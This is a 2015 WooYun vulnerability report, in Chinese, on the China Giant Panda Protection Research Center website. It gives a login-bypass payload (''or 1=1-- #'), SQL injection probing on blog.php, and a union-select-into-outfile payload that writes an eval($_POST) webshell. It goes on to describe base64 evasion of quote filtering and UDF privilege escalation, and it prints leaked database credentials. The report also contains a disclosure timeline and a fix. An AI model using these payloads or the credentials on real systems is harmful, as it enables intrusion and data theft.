漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0149475
漏洞标题:中国保护大熊猫研究中心首页存在SQL注入漏洞/后台登入绕过/物理路径泄露漏洞可Getshell
相关厂商:中国保护大熊猫研究中心
漏洞作者: 我在不想理你
提交时间:2015-10-26 10:03
修复时间:2015-12-14 16:08
公开时间:2015-12-14 16:08
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开
简要描述:
中国保护大熊猫研究中心中文、日语、英语三个网站首页均存在后台登录绕过,以及物理路径泄露,和sql注入漏洞,但网站过滤引号字符,需要使用小技巧绕过防御,详情看描述
详细说明:
http://**.**.**.**/bugs/wooyun-2010-0149063/trace/40ed46c3b88cb092d7c80e7389daa673
中国保护大熊猫研究中心首页存在SQL注入漏洞/后台登入绕过/物理路径泄露漏洞可Getshell
中国保护大熊猫研究中心中文、日语、英语三个网站首页均存在后台登录绕过,以及物理路径泄露,和sql注入漏洞,但网站过滤引号字符,需要使用小技巧绕过防御,详情看描述
1.后台登录绕过
在网站首页最底下,有一个管理页面点击进去,存在万能密码sql注入绕过
http://**.**.**.**/index.php
账号:'or 1=1-- #
2.后台存在上传页面,尝试上传php大马,爆出物理路径
3.blog.php页面存在sql注入
http://**.**.**.**/blog.php?id=1506
http://**.**.**.**/blog.php?id=1506 order by 12-- # 出错情况如下
http://**.**.**.**/blog.php?id=1506 order by 11-- # 出错情况如下
http://**.**.**.**/blog.php?id=1506 order by 1-- # 出错情况如下
由此 我们可以发现,这里其实一共有三个sql语句查询
order by 12出错在第一个sql查询
order by 11出错在第二个sql查询
order by 1出错在第三个sql查询updata
我们可以利用order by 11 使得第一个查询成功 但是没有回显结果 因为第二个sql查询出错挡住了结果
故验证正确
执行了但没回显
利用物理路径写入一句话
http://**.**.**.**/blog.php?id=1506 and 1=2 union select 1,2,一句话hex,4,5,6,7,8,9,10,11 into outfile 'D://panda//panda//1.txt' -- #
4.绕过防御
写入一句话eval($_POST[c]),但是菜刀并连不上去,因为输入过滤了引号
利用多参数传递,绕过引号
然后想如何写入大马提权呢,直接base64编码绕过防御后在解密落地吧
写入大马,查看配置
$dbservertype='mysql';
$servername='localhost';
$dbusername='PANDA';
$dbpassword='pandaeyes123';
查看mysql数据库,发现root密码跟PANDA密码md5一样,直接UDF提权
附system权限图
漏洞证明:
详情见详细说明
修复方案:
修复后台登入sql绕过,修复blog.php页面sql注入问题,更换物理路径
版权声明:转载请注明来源 我在不想理你@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-10-30 16:07
厂商回复:
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
最新状态:
暂无